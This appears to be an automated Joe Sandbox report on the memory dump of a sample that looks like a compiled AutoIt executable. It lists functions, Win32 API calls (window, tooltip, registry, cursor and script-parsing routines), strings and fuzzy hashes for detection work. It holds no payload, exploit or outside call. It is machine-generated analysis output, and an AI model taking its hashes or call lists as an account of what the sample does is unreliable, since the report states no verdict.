CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A7785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A7787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00A778A1
SendMessageW.USER32(?,00000421,?,?), ref: 00A778B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00A778C9
IsWindowVisible.USER32(?), ref: 00A778E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00A77904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00A77918
GetWindowRect.USER32(?,?), ref: 00A77930
MonitorFromPoint.USER32(?,?,00000002), ref: 00A77956
GetMonitorInfoW.USER32 ref: 00A77970
CopyRect.USER32(?,?), ref: 00A77987
SendMessageW.USER32(?,00000412,00000000), ref: 00A779F2

Strings

(, xrefs: 00A77965
tooltips_class32, xrefs: 00A77856
0, xrefs: 00A77735

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 3685ec3cbbcc96f42fcb7fe1a14f59079f3c15c6f73b8ad3c2df0e05c276757e
Instruction ID: 96c50deaeb2babf67b64672a6c6fe86658261a70f15dabbc83b43c4ba63f0927
Opcode Fuzzy Hash: 3685ec3cbbcc96f42fcb7fe1a14f59079f3c15c6f73b8ad3c2df0e05c276757e
Instruction Fuzzy Hash: E1B16971608341AFDB44DF64C988B6EBBE5BF88310F00C91DF6999B291DB70E845CB96

Function 00A56CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00A56CFB
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00A56D21
_wcscpy.LIBCMT ref: 00A56D4F
_wcscmp.LIBCMT ref: 00A56D5A
_wcscat.LIBCMT ref: 00A56D70
_wcsstr.LIBCMT ref: 00A56D7B
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00A56D97
_wcscat.LIBCMT ref: 00A56DE0
_wcscat.LIBCMT ref: 00A56DE7
_wcsncpy.LIBCMT ref: 00A56E12

Strings

%u.%u.%u.%u, xrefs: 00A56E75
\VarFileInfo\Translation, xrefs: 00A56D8F
04090000, xrefs: 00A56DCD
StringFileInfo\, xrefs: 00A56D6A
DefaultLangCodepage, xrefs: 00A56DFA

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: d34121b8848c4894f6c027a67a7fc7d6083cb71f7d3578aef013256e852d63b6
Instruction ID: b7138a20f44aefbc1d9fe0c37cd7edfd55f96246540f8b1b55e9071793a1b797
Opcode Fuzzy Hash: d34121b8848c4894f6c027a67a7fc7d6083cb71f7d3578aef013256e852d63b6
Instruction Fuzzy Hash: CF41D472A40210BBEB00BB74DE47EBF777CEF45721F44082AFD01A7182EB759A0596A5

Function 00A2A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A2A939
GetSystemMetrics.USER32(00000007), ref: 00A2A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A2A96C
GetSystemMetrics.USER32(00000008), ref: 00A2A974
GetSystemMetrics.USER32(00000004), ref: 00A2A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A2A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00A2A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A2A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A2AA0D
GetClientRect.USER32(00000000,000000FF), ref: 00A2AA2B
GetStockObject.GDI32(00000011), ref: 00A2AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 00A2AA52

Part of subcall function 00A2B63C: GetCursorPos.USER32(000000FF), ref: 00A2B64F
Part of subcall function 00A2B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00A2B66C
Part of subcall function 00A2B63C: GetAsyncKeyState.USER32(00000001), ref: 00A2B691
Part of subcall function 00A2B63C: GetAsyncKeyState.USER32(00000002), ref: 00A2B69F

SetTimer.USER32(00000000,00000000,00000028,00A2AB87), ref: 00A2AA79

Strings

AutoIt v3 GUI, xrefs: 00A2A9F1

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: d8cf0a5c11d619cfb10bf4b772f0ec3df17d1b0c82a63755537d63ffbdd8a071
Instruction ID: 98f790495b924be671423190ae544bf8fb41fcc1e6ba73a4fa8be49c67e10c1d
Opcode Fuzzy Hash: d8cf0a5c11d619cfb10bf4b772f0ec3df17d1b0c82a63755537d63ffbdd8a071
Instruction Fuzzy Hash: 72B18B71A0021AAFDB14DFA8DD45BAE7BB5FB18314F11422AFA16A72D0DB34D881CB51

Function 00A12EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00A12F7A
IsWindow.USER32(?), ref: 00A822FD

Strings

LAST, xrefs: 00A820B6
REGEXPCLASS, xrefs: 00A82149
CLASS, xrefs: 00A82128
TITLE, xrefs: 00A82292
HANDLE, xrefs: 00A820E2
REGEXPTITLE, xrefs: 00A820F8
ACTIVE, xrefs: 00A820CC
INSTANCE, xrefs: 00A8223C
ALL, xrefs: 00A82264

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 62970417-1919597938
Opcode ID: e869b57333ff9fab95f4635eb9a7bf3905706b98d967bc6d04af7c6337129ce6
Instruction ID: 3372e64771f6afe53c2eb0e5ee20db04b4ef648dd13ff58ef0616b64c1e332e2
Opcode Fuzzy Hash: e869b57333ff9fab95f4635eb9a7bf3905706b98d967bc6d04af7c6337129ce6
Instruction Fuzzy Hash: 5FD1B530108346ABCB04FF64C991BEABBB4FF54344F104A2DF456975A1DB30E9AACB91

Function 00A73639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A73735
RegCreateKeyExW.ADVAPI32(?,?,00000000,00AADC00,00000000,?,00000000,?,?), ref: 00A737A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00A737EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00A73874
RegCloseKey.ADVAPI32(?), ref: 00A73B94
RegCloseKey.ADVAPI32(00000000), ref: 00A73BA1

Strings

REG_DWORD, xrefs: 00A73A65
REG_QWORD, xrefs: 00A73AE2
REG_BINARY, xrefs: 00A73B2F
REG_MULTI_SZ, xrefs: 00A7395C
REG_EXPAND_SZ, xrefs: 00A73811
REG_SZ, xrefs: 00A738B2

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: ae33f035c085ee1ea2d481c8a8f11d7f682603588c109a2f04fc82ad045b1d8c
Instruction ID: 025c9f67087da27dcf73285edb2c617abf20d48741d52723dc0699a61e3d5cbc
Opcode Fuzzy Hash: ae33f035c085ee1ea2d481c8a8f11d7f682603588c109a2f04fc82ad045b1d8c
Instruction Fuzzy Hash: 69025976604601AFCB14EF18C991A6AB7E5FF88720F05C45DF99A9B2A1CB30ED41CB85

Function 00A76BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A76C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00A76D16

Strings

SELECTCLEAR, xrefs: 00A76D8D
GETSUBITEMCOUNT, xrefs: 00A76CA1
DESELECT, xrefs: 00A76DFC
GETTEXT, xrefs: 00A76CBF
GETSELECTEDCOUNT, xrefs: 00A76CF9
VIEWCHANGE, xrefs: 00A76ECD
SELECTINVERT, xrefs: 00A76DDE
GETITEMCOUNT, xrefs: 00A76C84
ISSELECTED, xrefs: 00A76D21
SELECTALL, xrefs: 00A76D75
FINDITEM, xrefs: 00A76E81
SELECT, xrefs: 00A76DA8
GETSELECTED, xrefs: 00A76E3C

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: b1f80910d9d5cb35c609ac9ac80667a242e973b9dda0a2539caed15e2a8beb81
Instruction ID: bbdeb9bb340265ec1c9b4b41079f4a0f303a35faade8f7ce6c3d6cca9c086c5e
Opcode Fuzzy Hash: b1f80910d9d5cb35c609ac9ac80667a242e973b9dda0a2539caed15e2a8beb81
Instruction Fuzzy Hash: 7DA16F302147519FCB14EF24DA51BAAB3A5BF84314F14C96DB86A6B2D2DB30EC45CB91

Function 00A4CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00A4CF91
__swprintf.LIBCMT ref: 00A4D032
_wcscmp.LIBCMT ref: 00A4D045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00A4D09A
_wcscmp.LIBCMT ref: 00A4D0D6
GetClassNameW.USER32(?,?,00000400), ref: 00A4D10D
GetDlgCtrlID.USER32(?), ref: 00A4D15F
GetWindowRect.USER32(?,?), ref: 00A4D195
GetParent.USER32(?), ref: 00A4D1B3
ScreenToClient.USER32(00000000), ref: 00A4D1BA
GetClassNameW.USER32(?,?,00000100), ref: 00A4D234
_wcscmp.LIBCMT ref: 00A4D248
GetWindowTextW.USER32(?,?,00000400), ref: 00A4D26E
_wcscmp.LIBCMT ref: 00A4D282

Strings

%s%u, xrefs: 00A4D02C

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: 8a18b03c07ec533937ec8fbc890b1a10504f3959f365bfeb9b703b0c36cfefd0
Instruction ID: e555f2c3e186d10947801ed88fe934963559e19f1c6e559049638c69b475c3c9
Opcode Fuzzy Hash: 8a18b03c07ec533937ec8fbc890b1a10504f3959f365bfeb9b703b0c36cfefd0
Instruction Fuzzy Hash: 89A1D475604302AFDB15DF64C984FEAB7A8FF84354F00861AFA99D3190DB70E946CB91

Function 00A4D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00A4D8EB
_wcscmp.LIBCMT ref: 00A4D8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 00A4D924
CharUpperBuffW.USER32(?,00000000), ref: 00A4D941
_wcscmp.LIBCMT ref: 00A4D95F
_wcsstr.LIBCMT ref: 00A4D970
GetClassNameW.USER32(00000018,?,00000400), ref: 00A4D9A8
_wcscmp.LIBCMT ref: 00A4D9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 00A4D9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 00A4DA28
_wcscmp.LIBCMT ref: 00A4DA38
GetClassNameW.USER32(00000010,?,00000400), ref: 00A4DA60
GetWindowRect.USER32(00000004,?), ref: 00A4DAC9

Strings

ThumbnailClass, xrefs: 00A4D9B3, 00A4DA33
@, xrefs: 00A4D8C6

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: fa90e64bfa3f525a775ec1969b5e3826ebda96264271787a0685cf0fdb31ffd5
Instruction ID: 94f44e4e89e58c519e44ed15b67922c66d34cc396473f4d389f412675a3ff9a3
Opcode Fuzzy Hash: fa90e64bfa3f525a775ec1969b5e3826ebda96264271787a0685cf0fdb31ffd5
Instruction Fuzzy Hash: 1F81BF351083059FDB01DF50C985FAA7BE8FF84758F1484AAFD899A096DB30ED46CBA1

Function 00A4D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00A4D753

Strings

HANDLE=, xrefs: 00A4D74C
CLASSNAME=, xrefs: 00A4D790
LAST, xrefs: 00A4D718
[HANDLE:, xrefs: 00A4D75F
[ALL, xrefs: 00A4D7F9
[LAST, xrefs: 00A4D800
REGEXP=, xrefs: 00A4D768
[CLASS:, xrefs: 00A4D7A3
ACTIVE, xrefs: 00A4D72E
[ACTIVE, xrefs: 00A4D740
[REGEXPTITLE:, xrefs: 00A4D77B
ALL, xrefs: 00A4D7E7

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: c10b2efc1b430ee0404d07b53044418a0d8f7d8197b1ff89d246630ed5efd4f1
Instruction ID: 1660ad6e4e6edde55bd85faeefd7b2167c27cca72dc175d2c211365c680a1c58
Opcode Fuzzy Hash: c10b2efc1b430ee0404d07b53044418a0d8f7d8197b1ff89d246630ed5efd4f1
Instruction Fuzzy Hash: A931BA39A88205BADB14FB60CE93FEEB3B4AF60714F210529F401B20D1EF61AE44C715

Function 00A4EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00A4EAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00A4EAC2
SetWindowTextW.USER32(?,?), ref: 00A4EAD9
GetDlgItem.USER32(?,000003EA), ref: 00A4EAEE
SetWindowTextW.USER32(00000000,?), ref: 00A4EAF4
GetDlgItem.USER32(?,000003E9), ref: 00A4EB04
SetWindowTextW.USER32(00000000,?), ref: 00A4EB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00A4EB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00A4EB45
GetWindowRect.USER32(?,?), ref: 00A4EB4E
SetWindowTextW.USER32(?,?), ref: 00A4EBB9
GetDesktopWindow.USER32 ref: 00A4EBBF
GetWindowRect.USER32(00000000), ref: 00A4EBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00A4EC12
GetClientRect.USER32(?,?), ref: 00A4EC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00A4EC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00A4EC6F

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 8fb625eb43eed9b709dd3785a1d32550883c8009d6f1045e4ac6a0caab5678ce
Instruction ID: 49cf9c2f4b0a9606aa6014eee4cf88d1dda125c760c371ee2a1c842b0ed3137a
Opcode Fuzzy Hash: 8fb625eb43eed9b709dd3785a1d32550883c8009d6f1045e4ac6a0caab5678ce
Instruction Fuzzy Hash: 89515175A00709EFDB20DFA8CD89F6EBBF5FF44705F004929E686A25A0CB74A945CB10

Function 00A679B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00A679C6
LoadCursorW.USER32(00000000,00007F00), ref: 00A679D1
LoadCursorW.USER32(00000000,00007F03), ref: 00A679DC
LoadCursorW.USER32(00000000,00007F8B), ref: 00A679E7
LoadCursorW.USER32(00000000,00007F01), ref: 00A679F2
LoadCursorW.USER32(00000000,00007F81), ref: 00A679FD
LoadCursorW.USER32(00000000,00007F88), ref: 00A67A08
LoadCursorW.USER32(00000000,00007F80), ref: 00A67A13
LoadCursorW.USER32(00000000,00007F86), ref: 00A67A1E
LoadCursorW.USER32(00000000,00007F83), ref: 00A67A29
LoadCursorW.USER32(00000000,00007F85), ref: 00A67A34
LoadCursorW.USER32(00000000,00007F82), ref: 00A67A3F
LoadCursorW.USER32(00000000,00007F84), ref: 00A67A4A
LoadCursorW.USER32(00000000,00007F04), ref: 00A67A55
LoadCursorW.USER32(00000000,00007F02), ref: 00A67A60
LoadCursorW.USER32(00000000,00007F89), ref: 00A67A6B
GetCursorInfo.USER32(?), ref: 00A67A7B

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 760c995bc65ab213394a0f51f1ce2d73d23f5c0b775994f9e6135a366542e3ff
Instruction ID: 6e9ea1525e084e6a2fd5c990a0d398a604bee8ec2d7091d6fe4ceb9ae81271e1
Opcode Fuzzy Hash: 760c995bc65ab213394a0f51f1ce2d73d23f5c0b775994f9e6135a366542e3ff
Instruction Fuzzy Hash: EB3113B0E4831A6ADB109FF68C8995FBFF8FF14754F50452AA50DE7280DA78A5008FA1

Function 00A1C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 00A2E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00A1C8B7,?,00002000,?,?,00000000,?,00A1419E,?,?,?,00AADC00), ref: 00A2E984

Part of subcall function 00A1660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A153B1,?,?,00A161FF,?,00000000,00000001,00000000), ref: 00A1662F

__wsplitpath.LIBCMT ref: 00A1C93E

Part of subcall function 00A31DFC: __wsplitpath_helper.LIBCMT ref: 00A31E3C

_wcscpy.LIBCMT ref: 00A1C953
_wcscat.LIBCMT ref: 00A1C968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00A1C978
SetCurrentDirectoryW.KERNEL32(?), ref: 00A1CABE

Part of subcall function 00A1B337: _wcscpy.LIBCMT ref: 00A1B36F

Strings

Bad directive syntax error, xrefs: 00A83429
>>>AUTOIT SCRIPT<<<, xrefs: 00A8311B
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00A83098
Error opening the file, xrefs: 00A830B4, 00A8313D
Unterminated string, xrefs: 00A83470
AU3!, xrefs: 00A1C90C
EA06, xrefs: 00A830C9

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: fcac00b5961d1957e79dafc4b0c271c750dacecbf08b1b255184cf410a24443c
Instruction ID: eccd9adbc45cadad091310eb6c7963c5db58b356c5cea5a93d788c6f7bf68922
Opcode Fuzzy Hash: fcac00b5961d1957e79dafc4b0c271c750dacecbf08b1b255184cf410a24443c
Instruction Fuzzy Hash: 54128E715083419FCB24EF24C981AAFBBF5BF99750F00492EF58A97251DB30DA89CB52

Function 00A7CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A7CEFB
DestroyWindow.USER32(?,?), ref: 00A7CF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A7CFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A7D016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A7D025
DestroyWindow.USER32(?), ref: 00A7D042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A10000,00000000), ref: 00A7D075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A7D094
GetDesktopWindow.USER32 ref: 00A7D0A9
GetWindowRect.USER32(00000000), ref: 00A7D0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A7D0C2
